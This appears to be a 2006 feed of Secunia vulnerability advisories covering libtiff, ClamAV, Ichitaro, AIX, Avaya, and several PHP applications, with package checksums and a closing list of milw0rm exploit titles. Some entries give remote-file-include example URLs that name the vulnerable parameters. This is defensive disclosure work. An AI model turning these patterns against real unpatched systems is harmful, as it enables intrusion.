8f3954077d7f47b5e61afdbb2a776a48 x86_64/2006.0/RPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.x86_64.rpm
00604741447b008c86484ff559171bae x86_64/2006.0/RPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.x86_64.rpm
330a70efd7bf58f3261d03ec5ac47034 x86_64/2006.0/RPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.x86_64.rpm
d17915183c1510785adc8d1ba421030b x86_64/2006.0/RPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.x86_64.rpm
9e33e2a0c3d4a92a0b420c417fcd3469 x86_64/2006.0/RPMS/yelp-2.10.0-6.1.20060mdk.x86_64.rpm
60279919aa5f17c2ecd9f64db87cb952 x86_64/2006.0/SRPMS/devhelp-0.10-7.1.20060mdk.src.rpm
c446c046409b6697a863868fe5c64222 x86_64/2006.0/SRPMS/epiphany-1.8.5-4.1.20060mdk.src.rpm
e726300336f737c8952f664bf1866d6f x86_64/2006.0/SRPMS/galeon-2.0.1-1.1.20060mdk.src.rpm
e9e30596eceb0bc9a03f7880cd7d14ea x86_64/2006.0/SRPMS/gnome-doc-utils-0.4.4-2.1.20060mdk.src.rpm
4168c73cba97276fa4868b4ac2c7eb19 x86_64/2006.0/SRPMS/mozilla-firefox-1.5.0.6-1.4.20060mdk.src.rpm
56becb4c6755376ee10e50047fee65a0 x86_64/2006.0/SRPMS/mozilla-firefox-br-1.5.0.6-0.2.20060mdk.src.rpm
4d77e6309e7e375aec38aee2a141e35b x86_64/2006.0/SRPMS/mozilla-firefox-ca-1.5.0.6-0.2.20060mdk.src.rpm
fe7bd0b0c6b61416f96d137b1a92a437 x86_64/2006.0/SRPMS/mozilla-firefox-cs-1.5.0.6-0.2.20060mdk.src.rpm
c3724cca845ce05cf648f362f83038bd x86_64/2006.0/SRPMS/mozilla-firefox-da-1.5.0.6-0.2.20060mdk.src.rpm
25fe2702343a719c20605f50d5aa1e34 x86_64/2006.0/SRPMS/mozilla-firefox-de-1.5.0.6-0.2.20060mdk.src.rpm
41bf67b80e5665de595b2ee9f7721161 x86_64/2006.0/SRPMS/mozilla-firefox-el-1.5.0.6-0.2.20060mdk.src.rpm
e326a042c23f8a3e1736a8bd0c6ec2a0 x86_64/2006.0/SRPMS/mozilla-firefox-es-1.5.0.6-0.2.20060mdk.src.rpm
27d9ceca2f738878af2caff5ca0f3242 x86_64/2006.0/SRPMS/mozilla-firefox-fi-1.5.0.6-0.2.20060mdk.src.rpm
c0f8f908861f6bdce69aa3dedc9d3182 x86_64/2006.0/SRPMS/mozilla-firefox-fr-1.5.0.6-0.2.20060mdk.src.rpm
9ba714fa16a09fba10ded7ecde966c11 x86_64/2006.0/SRPMS/mozilla-firefox-ga-1.5.0.6-0.2.20060mdk.src.rpm
47457095800038d73f3bdcb2f0ed36d0 x86_64/2006.0/SRPMS/mozilla-firefox-he-1.5.0.6-0.2.20060mdk.src.rpm
05009be65b3fea49699b31df71062dee x86_64/2006.0/SRPMS/mozilla-firefox-hu-1.5.0.6-0.2.20060mdk.src.rpm
afbd053cdb6ff14c43e689c89c4550e0 x86_64/2006.0/SRPMS/mozilla-firefox-it-1.5.0.6-0.2.20060mdk.src.rpm
2a0787c0257695b6fc1aaf1bdf8b9534 x86_64/2006.0/SRPMS/mozilla-firefox-ja-1.5.0.6-0.2.20060mdk.src.rpm
112d4d2954a00325f0a0531bae150d45 x86_64/2006.0/SRPMS/mozilla-firefox-ko-1.5.0.6-0.2.20060mdk.src.rpm
01c5ab334ff459db03636aa8de1cced5 x86_64/2006.0/SRPMS/mozilla-firefox-nb-1.5.0.6-0.2.20060mdk.src.rpm
ad95f2d936c8015fd0c6f383975c286f x86_64/2006.0/SRPMS/mozilla-firefox-nl-1.5.0.6-0.2.20060mdk.src.rpm
2393b778369ede7080e6e3b846b773e7 x86_64/2006.0/SRPMS/mozilla-firefox-pl-1.5.0.6-0.2.20060mdk.src.rpm
15c7832479b17e2123762a44bb3f85f3 x86_64/2006.0/SRPMS/mozilla-firefox-pt_BR-1.5.0.6-0.2.20060mdk.src.rpm
cdb551a0c81fb597818506e9534966ed x86_64/2006.0/SRPMS/mozilla-firefox-ro-1.5.0.6-0.2.20060mdk.src.rpm
b56224c409b82426cd1414f4c2694619 x86_64/2006.0/SRPMS/mozilla-firefox-ru-1.5.0.6-0.2.20060mdk.src.rpm
8941bf88442f03649638b745948ea2f7 x86_64/2006.0/SRPMS/mozilla-firefox-sk-1.5.0.6-0.2.20060mdk.src.rpm
b929ab1c79140da9439f1ab95be84ff6 x86_64/2006.0/SRPMS/mozilla-firefox-sl-1.5.0.6-0.2.20060mdk.src.rpm
341dd76ff73c819a0c3af0f568f5989a x86_64/2006.0/SRPMS/mozilla-firefox-sv-1.5.0.6-0.2.20060mdk.src.rpm
9d4673a1f24a354f71d2b17b3889c4a2 x86_64/2006.0/SRPMS/mozilla-firefox-tr-1.5.0.6-0.2.20060mdk.src.rpm
57b9a304899801e30a3c4f451e411a86 x86_64/2006.0/SRPMS/mozilla-firefox-zh_CN-1.5.0.6-0.2.20060mdk.src.rpm
a42b81860581cc48344a3d3c5e133fcb x86_64/2006.0/SRPMS/mozilla-firefox-zh_TW-1.5.0.6-0.2.20060mdk.src.rpm
93cb0acaeddb095d13b37aeb0ab4dd49 x86_64/2006.0/SRPMS/yelp-2.10.0-6.1.20060mdk.src.rpm

Changelog:
2006-08-18: Added additional information about updated language packs.

Original Advisory:
http://www.mandriva.com/security/advisories?name=MDKSA-2006:143

Other References:
SA14938:
http://secunia.com/advisories/14938/

SA19873:
http://secunia.com/advisories/19873/

SA19631:
http://secunia.com/advisories/19631/

SA20242:
http://secunia.com/advisories/20242/

SA20244:
http://secunia.com/advisories/20244/

SA20376:
http://secunia.com/advisories/20376/
]]> http://secunia.com/advisories/21532/ Mon, 21 Aug 2006 09:11:32 -0400 Release Date: 2006-08-18

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: Slackware Linux 10.0
Slackware Linux 9.0
Slackware Linux 9.1

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-3459
CVE-2006-3460
CVE-2006-3461
CVE-2006-3462
CVE-2006-3463
CVE-2006-3464
CVE-2006-3465

Description:
Slackware has issued an update for libtiff. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

For more information:
SA21304

Solution:
Apply updated packages.

Slackware 9.0:
ftp://ftp.slackware.com/pub/slac...ibtiff-3.8.2-i386-1_slack9.0.tgz

Slackware 9.1:
ftp://ftp.slackware.com/pub/slac...ibtiff-3.8.2-i486-1_slack9.1.tgz

Slackware 10.0:
ftp://ftp.slackware.com/pub/slac...btiff-3.8.2-i486-1_slack10.0.tgz

Original Advisory:
http://slackware.com/security/vi...&m=slackware-security.536600

Other References:
SA21304:
http://secunia.com/advisories/21304/


]]> http://secunia.com/advisories/21537/ Mon, 21 Aug 2006 09:11:01 -0400 Release Date: 2006-08-18

Critical:
Less critical
Impact: Privilege escalation
Where: Local system
Solution Status: Vendor Workaround

OS: AIX 5.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
A vulnerability has been reported in IBM AIX, which can be exploited by malicious, local users to gain escalated privileges.

The vulnerability is caused due to an unspecified error within the "setlocale()" function of libc.a.

Solution:
Apply temporary fix until APARs are available.

Interim fix:
ftp://aix.software.ibm.com/aix/efixes/security/setlocale_ifix.tar.Z

APAR for AIX 5.1.0:
IY88528 (available approx. 2006-09-06)

APAR for AIX 5.2.0:
IY88512 (available approx. 2006-09-06)

APAR for AIX 5.3.0:
IY88183 (available approx. 2006-09-06)

Provided and/or discovered by:
Reported by the vendor.
]]> http://secunia.com/advisories/21541/ Mon, 21 Aug 2006 09:10:29 -0400 Release Date: 2006-08-21

Critical:
Extremely critical
Impact: System access
Where: From remote
Solution Status: Partial Fix

Software: Ichitaro 10.x
Ichitaro 11.x
Ichitaro 12.x
Ichitaro 13.x
Ichitaro 2004
Ichitaro 2005
Ichitaro 2006
Ichitaro 9.x
Ichitaro for Linux

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
A vulnerability has been reported in Ichitaro, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error when processing a specially crafted document. This can be exploited to cause a stack-based buffer overflow via an overly long string.

Successful exploitation allows execution of arbitrary code.

NOTE: The vulnerability is currently being actively exploited.

Solution:
Apply patch.

Ichitaro 2005/2006:
A patch was released on 2006-08-18.

Ichitaro for Linux:
A patch should be available soon.

Provided and/or discovered by:
Discovered in the wild as a so-called 0-day.

Original Advisory:
Justsystem (japanese):
http://www.justsystem.co.jp/info/pd6002.html]]> http://secunia.com/advisories/21552/ Mon, 21 Aug 2006 09:09:41 -0400 Release Date: 2006-08-21

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Sonium Enterprise Adressbook 0.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Philipp Niedziela has discovered some vulnerabilities in Sonium Enterprise Adressbook, which can be exploited by malicious users to compromise a vulnerable system.

Input passed to the "folder" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Examples:
http://[host]/plugins/1_Adressbuch/new.php?folder=[file]
http://[host]/plugins/2_Branchen/edit.php?folder=[file]
http://[host]/plugins/3_Typ/delete.php?folder=[file]

More files under the "plugins" directory are affected.

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 0.2. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Restrict access to the "plugin" directory e.g. via a .htaccess file.

Provided and/or discovered by:
Philipp Niedziela

Original Advisory:
http://www.bb-pcsecurity.de/Webs...ook_Version_0.2_(folder)_RFI.htm


]]> http://secunia.com/advisories/21553/ Mon, 21 Aug 2006 09:08:44 -0400 Release Date: 2006-08-21

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: Debian GNU/Linux 3.1
Debian GNU/Linux unstable alias sid

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-4018

Description:
Debian has issued an update for clamav. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

For more information:
SA21374

Solution:
Apply updated packages.

-- Debian GNU/Linux 3.1 alias sarge --

Source archives:

http://security.debian.org/pool/...lamav/clamav_0.84-2.sarge.10.dsc
Size/MD5 checksum: 874 579ac9552dbc0075d4d087042c231804
http://security.debian.org/pool/...v/clamav_0.84-2.sarge.10.diff.gz
Size/MD5 checksum: 176298 01bb523d1fd48f70a3277e12b965d426
http://security.debian.org/pool/...c/clamav/clamav_0.84.orig.tar.gz
Size/MD5 checksum: 4006624 c43213da01d510faf117daa9a4d5326c

Architecture independent components:

http://security.debian.org/pool/...mav-base_0.84-2.sarge.10_all.deb
Size/MD5 checksum: 154834 aa3600fb1bccc896debdf371c6b94979
http://security.debian.org/pool/...mav-docs_0.84-2.sarge.10_all.deb
Size/MD5 checksum: 694360 6cd87074ba63f69e7cf065af1665839f
http://security.debian.org/pool/...estfiles_0.84-2.sarge.10_all.deb
Size/MD5 checksum: 123846 317f7c5a1fcba2c7502a7011edf07640

Alpha architecture:

http://security.debian.org/pool/...clamav_0.84-2.sarge.10_alpha.deb
Size/MD5 checksum: 74756 ee20948ad40b44d08ea016becd29c59d
http://security.debian.org/pool/...daemon_0.84-2.sarge.10_alpha.deb
Size/MD5 checksum: 48832 1f24a23e371f0c7cec48123dbc62d87f
http://security.debian.org/pool/...shclam_0.84-2.sarge.10_alpha.deb
Size/MD5 checksum: 2176454 f76987654e839526da6d30ef50678fee
http://security.debian.org/pool/...milter_0.84-2.sarge.10_alpha.deb
Size/MD5 checksum: 42108 ca5ad43ec67d02f425db4cde24ea359c
http://security.debian.org/pool/...av-dev_0.84-2.sarge.10_alpha.deb
Size/MD5 checksum: 255698 b0c02ebb16c838039d25c837887e2b20
http://security.debian.org/pool/...lamav1_0.84-2.sarge.10_alpha.deb
Size/MD5 checksum: 285520 b7e6deae0b3f715ce64bd450fa1bed55

AMD64 architecture:

http://security.debian.org/pool/...clamav_0.84-2.sarge.10_amd64.deb
Size/MD5 checksum: 68854 eeca1c599d8423fedbd7458c2823e675
http://security.debian.org/pool/...daemon_0.84-2.sarge.10_amd64.deb
Size/MD5 checksum: 44190 a9ffbdbf3145ed7ee1b09f754f6f1cba
http://security.debian.org/pool/...shclam_0.84-2.sarge.10_amd64.deb
Size/MD5 checksum: 2173266 b2bbfd444309513e0fbb0ffae9f7ca6f
http://security.debian.org/pool/...milter_0.84-2.sarge.10_amd64.deb
Size/MD5 checksum: 39992 c69a8afe5eb511d6d8fda40f4430acc4
http://security.debian.org/pool/...av-dev_0.84-2.sarge.10_amd64.deb
Size/MD5 checksum: 176430 114e0b901947b5c05e14863372b20371
http://security.debian.org/pool/...lamav1_0.84-2.sarge.10_amd64.deb
Size/MD5 checksum: 259648 34f48f60ab045c94bccdb2ef545c58bf

ARM architecture:

http://security.debian.org/pool/...v/clamav_0.84-2.sarge.10_arm.deb
Size/MD5 checksum: 63940 0149c2854989385bc91dd7f3857c22de
http://security.debian.org/pool/...v-daemon_0.84-2.sarge.10_arm.deb
Size/MD5 checksum: 39602 3069d8dbd7134cdbe2aafbee73f394eb
http://security.debian.org/pool/...reshclam_0.84-2.sarge.10_arm.deb
Size/MD5 checksum: 2171302 36abc779119678735260f262abd46b14
http://security.debian.org/pool/...v-milter_0.84-2.sarge.10_arm.deb
Size/MD5 checksum: 37320 1a2b2bf609209bf679f1dc0595c014f5
http://security.debian.org/pool/...amav-dev_0.84-2.sarge.10_arm.deb
Size/MD5 checksum: 174866 dd1d6ecdae9b72d4370269553de7822c
http://security.debian.org/pool/...bclamav1_0.84-2.sarge.10_arm.deb
Size/MD5 checksum: 249684 ea978f5d747b263abbab696f3ee43d84

Intel IA-32 architecture:

http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_i386.deb
Size/MD5 checksum: 65192 65526868baf4727a43f50c3fc9d5bfaf
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_i386.deb
Size/MD5 checksum: 40314 3dcbd76b10f316cb966c9d0481c86d95
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_i386.deb
Size/MD5 checksum: 2171614 56f381689bb923aff94ea1c089c972e6
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_i386.deb
Size/MD5 checksum: 38036 0ba3584e974098cacb54356f01ba5b81
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_i386.deb
Size/MD5 checksum: 159624 f1df89303a47b8feadb0cc34a3af524e
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_i386.deb
Size/MD5 checksum: 254320 fa8338410aacfed8a7699cb2e89f2f24

Intel IA-64 architecture:

http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_ia64.deb
Size/MD5 checksum: 81812 24394b30b3d05645157d681e31e4a334
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_ia64.deb
Size/MD5 checksum: 55236 0547745bea0ea7c00874cb28bb8c6076
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_ia64.deb
Size/MD5 checksum: 2180240 bb88c2a0b8d3954e4c8c0bb2eb254626
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_ia64.deb
Size/MD5 checksum: 49200 e89b9424d435e4b54b5541310df54d18
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_ia64.deb
Size/MD5 checksum: 252048 307a1171d4d24ec18b405300c8abc8c3
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_ia64.deb
Size/MD5 checksum: 317632 f26a3c8aa9686fe1325f19ceb21ae876

HP Precision architecture:

http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_hppa.deb
Size/MD5 checksum: 68266 53f9a7dc51264112fa03824a6f159a55
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_hppa.deb
Size/MD5 checksum: 43282 2cd52c92c09be751c18871aa1779e412
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_hppa.deb
Size/MD5 checksum: 2173738 3b5b881e2c5a9e68ea3ef9181acb8f00
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_hppa.deb
Size/MD5 checksum: 39448 452a3eca157ec974030633ecd149f1d7
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_hppa.deb
Size/MD5 checksum: 202646 f11e31f03249e881007664e1fe68e575
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_hppa.deb
Size/MD5 checksum: 283402 84b6b57ffe3d653db556102896b32d73

Motorola 680x0 architecture:

http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_m68k.deb
Size/MD5 checksum: 62518 cc621b1387c92be1ac653e05f3ca5971
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_m68k.deb
Size/MD5 checksum: 38206 36154fc4bd779e3ab9ac3eb51ea0f833
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_m68k.deb
Size/MD5 checksum: 2170522 8b576066f0b981f9e55b4400f6ecbe69
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_m68k.deb
Size/MD5 checksum: 35060 61a22458f305bd2c28834c62cdaa9e9a
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_m68k.deb
Size/MD5 checksum: 146266 0fbd30a2c656ef6ec0d75c010aedb5a4
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_m68k.deb
Size/MD5 checksum: 250410 8b804dadd0fc35420d477228d254d543

Big endian MIPS architecture:

http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_mips.deb
Size/MD5 checksum: 67948 5c5216d18d7d584a5f0859f0094aa417
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_mips.deb
Size/MD5 checksum: 43792 512afdde1b2da6791bd463de827449f4
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_mips.deb
Size/MD5 checksum: 2173022 48dae648fe0713d6afc79127838d5271
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_mips.deb
Size/MD5 checksum: 37672 e34c78057e3f92367bd8591364550e3c
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_mips.deb
Size/MD5 checksum: 195464 1fb3cda50e0d5c2db77ae4fb985516e7
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_mips.deb
Size/MD5 checksum: 257498 0262d853aa80aa7a58d19a2eca3b44e8

Little endian MIPS architecture:

http://security.debian.org/pool/...lamav_0.84-2.sarge.10_mipsel.deb
Size/MD5 checksum: 67554 4185522ad02b337b9da6663cbd1024ac
http://security.debian.org/pool/...aemon_0.84-2.sarge.10_mipsel.deb
Size/MD5 checksum: 43592 fb26021b07612a92028d8830f6ff3804
http://security.debian.org/pool/...hclam_0.84-2.sarge.10_mipsel.deb
Size/MD5 checksum: 2173004 9193ea804f2b7c19548417165178ca05
http://security.debian.org/pool/...ilter_0.84-2.sarge.10_mipsel.deb
Size/MD5 checksum: 37960 2030dcaed3d04a2d7a918940e310d280
http://security.debian.org/pool/...v-dev_0.84-2.sarge.10_mipsel.deb
Size/MD5 checksum: 191886 2b3158916a4251c4d5a5381ebb49c838
http://security.debian.org/pool/...amav1_0.84-2.sarge.10_mipsel.deb
Size/MD5 checksum: 255096 3bf9a5cee57791754a88bbb96a2c6fc0

PowerPC architecture:

http://security.debian.org/pool/...amav_0.84-2.sarge.10_powerpc.deb
Size/MD5 checksum: 69290 63e95304cf75bbc09fdcdc74b5065e81
http://security.debian.org/pool/...emon_0.84-2.sarge.10_powerpc.deb
Size/MD5 checksum: 44666 000b1226fe5f62d5dab412f302ee2624
http://security.debian.org/pool/...clam_0.84-2.sarge.10_powerpc.deb
Size/MD5 checksum: 2173672 d72f0dbd55ddf72f68b7455b39318593
http://security.debian.org/pool/...lter_0.84-2.sarge.10_powerpc.deb
Size/MD5 checksum: 38866 3cbd90828e563181db163c8f2be59dbf
http://security.debian.org/pool/...-dev_0.84-2.sarge.10_powerpc.deb
Size/MD5 checksum: 187672 529b30228ccd9858381953ef29a1a799
http://security.debian.org/pool/...mav1_0.84-2.sarge.10_powerpc.deb
Size/MD5 checksum: 264866 3b4f8f04c88d0ae27db4c37d43adb7b8

IBM S/390 architecture:

http://security.debian.org/pool/.../clamav_0.84-2.sarge.10_s390.deb
Size/MD5 checksum: 67900 6025940acf3fd7317140990d3b767598
http://security.debian.org/pool/...-daemon_0.84-2.sarge.10_s390.deb
Size/MD5 checksum: 43556 9121cc8c74337e8fc8df83b6f4d317aa
http://security.debian.org/pool/...eshclam_0.84-2.sarge.10_s390.deb
Size/MD5 checksum: 2172970 b76417d453c968451ca19abff7f3b1cf
http://security.debian.org/pool/...-milter_0.84-2.sarge.10_s390.deb
Size/MD5 checksum: 38934 c6ba23cdab5a45fd0ed314ac85537ad6
http://security.debian.org/pool/...mav-dev_0.84-2.sarge.10_s390.deb
Size/MD5 checksum: 182620 0d27f0ef5d3e2e530486ec2391f1ee0d
http://security.debian.org/pool/...clamav1_0.84-2.sarge.10_s390.deb
Size/MD5 checksum: 269456 272e24025e52efd9c7b1f41c3f92765e

Sun Sparc architecture:

http://security.debian.org/pool/...clamav_0.84-2.sarge.10_sparc.deb
Size/MD5 checksum: 64430 6a3177a86caaf0b5a1a9709c85e56749
http://security.debian.org/pool/...daemon_0.84-2.sarge.10_sparc.deb
Size/MD5 checksum: 39468 81982545aa069ecface4252e0892f57e
http://security.debian.org/pool/...shclam_0.84-2.sarge.10_sparc.deb
Size/MD5 checksum: 2171174 a7f6fb7b6e0948a598d7a85c12c5f1d5
http://security.debian.org/pool/...milter_0.84-2.sarge.10_sparc.deb
Size/MD5 checksum: 36856 37da7d38dfbeebdcb933892eb7826cab
http://security.debian.org/pool/...av-dev_0.84-2.sarge.10_sparc.deb
Size/MD5 checksum: 175820 3af502c16ea8a016050d84a24bc9278f
http://security.debian.org/pool/...lamav1_0.84-2.sarge.10_sparc.deb
Size/MD5 checksum: 264768 d9b5237456cfe44294020c771982b8c3

-- Debian GNU/Linux unstable alias sid --

Fixed in version 0.88.4-2.

Original Advisory:
http://www.us.debian.org/security/2006/dsa-1153

Other References:
SA21374:
http://secunia.com/advisories/21374/
]]> http://secunia.com/advisories/21562/ Mon, 21 Aug 2006 09:08:03 -0400 Release Date: 2006-08-21

Critical:
Moderately critical
Impact: Security Bypass
Cross Site Scripting
DoS
System access
Where: From remote
Solution Status: Unpatched

OS: Avaya Converged Communications Server (CCS) 2.x
Avaya Converged Communications Server (CCS) 3.x
Avaya Intuity LX
Avaya Message Networking 2.x
Avaya S8XXX Media Servers
Avaya SIP Enablement Services (SES) 3.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

CVE reference: CVE-2006-0208
CVE-2006-0996
CVE-2006-1990
CVE-2005-2933

Description:
Avaya has acknowledged some vulnerabilities in PHP included in various Avaya products, which can be exploited by malicious users to cause a DoS (Denial of Service) or compromise a vulnerable system, and by malicious people to conduct cross-site scripting attacks and potentially compromise a vulnerable system.

For more information:
SA17062
SA18431
SA19599
SA19803

The following products are affected:
* Avaya S87XX/S8500/S8300 (all versions)
* Avaya Intuity LX (all versions)
* Avaya Message Networking (all versions)
* Avaya CCS/SES (all versions)]]> http://secunia.com/advisories/21564/ Mon, 21 Aug 2006 09:07:29 -0400 Release Date: 2006-08-21

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: Fantastic News 2.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
SHiKaA has reported a vulnerability in Fantastic News, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "CONFIG[script_path]" parameter in news.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

The vulnerability has been reported in version 2.1.3. Other versions may also be affected.

Solution:
The vulnerability has reportedly been fixed in version 2.1.4.

Provided and/or discovered by:
SHiKaA

Original Advisory:
http://milw0rm.com/exploits/2221]]> http://secunia.com/advisories/21571/ Mon, 21 Aug 2006 09:06:57 -0400 Release Date: 2006-08-21

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: Tutti Nova 1.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
SHiKaA has discovered some vulnerabilities in Tutti Nova, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "TNLIB_DIR" parameter in multiple files is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Examples:
http://[host]/include/novalib/class.novaEdit.mysql.php?TNLIB_DIR=[file]
http://[host]/include/novalib/class.novaAdmin.mysql.php?TNLIB_DIR=[file]
http://[host]/include/novalib/class.novaRead.mysql.php?TNLIB_DIR=[file]

Successful exploitation requires that "register_globals" is enabled.

The vulnerabilities have been confirmed in version 1.6. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Restrict access to the "include" directory e.g. via a .htaccess file.

Provided and/or discovered by:
SHiKaA

Original Advisory:
http://milw0rm.com/exploits/2220]]> http://secunia.com/advisories/21572/ Mon, 21 Aug 2006 09:06:12 -0400 Release Date: 2006-08-21

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Unpatched

Software: PHlyMail Lite 3.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Kacper has discovered a vulnerability in PHlyMail Lite, which can be exploited by malicious people to compromise a vulnerable system.

Input passed to the "_PM_[path][handler]" parameter in handlers/email/mod.listmail.php is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been confirmed in version 3.4.4 (Build 3.04.04). Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly verified.

Set "register_globals" to "Off".

Provided and/or discovered by:
Kacper

Original Advisory:
http://milw0rm.com/exploits/2211
]]> http://secunia.com/advisories/21582/ Mon, 21 Aug 2006 09:05:35 -0400 Release Date: 2006-08-21

Critical:
Less critical
Impact: Manipulation of data
Exposure of system information
Exposure of sensitive information
Where: From remote
Solution Status: Vendor Patch

Software: WebAdmin 3.x

Select a product and view a complete list of all Patched/Unpatched Secunia advisories affecting it.

Description:
Some vulnerabilities have been reported in WebAdmin, which can be exploited by certain malicious users to manipulate or gain knowledge of sensitive information.

1) Input validation errors in logfile_view.wdm and configfile_view.wdm makes it possible for a global administrative user to view arbitrary files via a specially crafted URL.

2) It possible for a domain administrative user to edit a global administrative user's account. This can be exploited to change the password and then login as the global administrative user.

Solution:
Update to version 3.25.

Provided and/or discovered by:
Reported by the vendor.


]]> http://secunia.com/advisories/21558/ Mon, 21 Aug 2006 09:05:16 -0400 2006-08-14 Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
2006-08-16 PHP <= 4.4.3 / 5.1.4 (sscanf) Local Buffer Overflow Exploit
2006-08-18 Joomla Artlinks Component <= 1.0b4 Remote Include Vulnerability 2006-08-18 PHlyMail Lite <= 3.4.4 (mod.listmail.php) Remote Include Vulnerability 2006-08-18 phpCodeGenie <= 3.0.2 (BEAUT_PATH) Remote File Include Vulnerability 2006-08-17 Woltlab Burning Board <= 2.3.5 (links.php) SQL Injection Exploit (2) 2006-08-17 CubeCart <= 3.0.11 (oid) Remote Blind SQL Injection Exploit 2006-08-17 IRSR <= 0.2 (_sysSessionPath) Remote File Include Vulnerability 2006-08-17 WTcom <= 0.2.4-alpha (torrents.php) Remote SQL Injection Vulnerability 2006-08-17 POWERGAP <= 2003 (s0x.php) Remote File Include Vulnerability 2006-08-17 Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability 2006-08-17 Joomla com_jim Component <= 1.0.1 Remote File Include Vulnerability 2006-08-17 Joomla Mosets Tree <= 1.0 Remote File Include Vulnerability 2006-08-17 Mambo phpShop Component <= 1.2 RC2b File Include Vulnerability 2006-08-17 Mambo a6mambocredits Component 1.0.0 File Include Vulnerability 2006-08-16 dotProject <= 2.0.4 (baseDir) Remote File Include Vulnerability 2006-08-16 OPT Max <= 1.2.0 (CRM_inc) Remote File Include Vulnerability 2006-08-16 Mambo CopperminePhotoGalery Component Remote Include Vulnerability 2006-08-15 WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit 2006-08-15 Discloser <= 0.0.4 (fileloc) Remote File Include Vulnerabilities 2006-08-15 WEBInsta CMS <= 0.3.1 (users.php) Remote File Include Vulnerability 2006-08-15 PHProjekt <= 5.1 Multiple Remote File Include Vulnerabilities 2006-08-14 phPay <= 2.02 (nu_mail.inc.php) Remote mail() Injection Exploit
2006-08-14 Mambo mmp Component <= 1.2 Remote File Include Vulnerability 2006-08-14 ProjectButler <= 0.8.4 (rootdir) Remote File Include Vulnerabilities 2006-08-14 Mambo Peoplebook Component 1.0 Remote File Include Vulnerability 2006-08-14 Spidey Blog Script <== 1.5 (tr) Remote SQL Injection Vulnerability 2006-08-13 Joomla Webring Component <= 1.0 Remote Include Vulnerability 2006-08-13 XMB <= 1.9.6 Final basename() Remote Command Execution Exploit 2006-08-12 WEBinsta CMS <= 0.3.1 (templates_dir) Remote File Include Exploit 2006-08-11 Wheatblog <= 1.1 (session.php) Remote File Include Vulnerability 2006-08-10 SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit
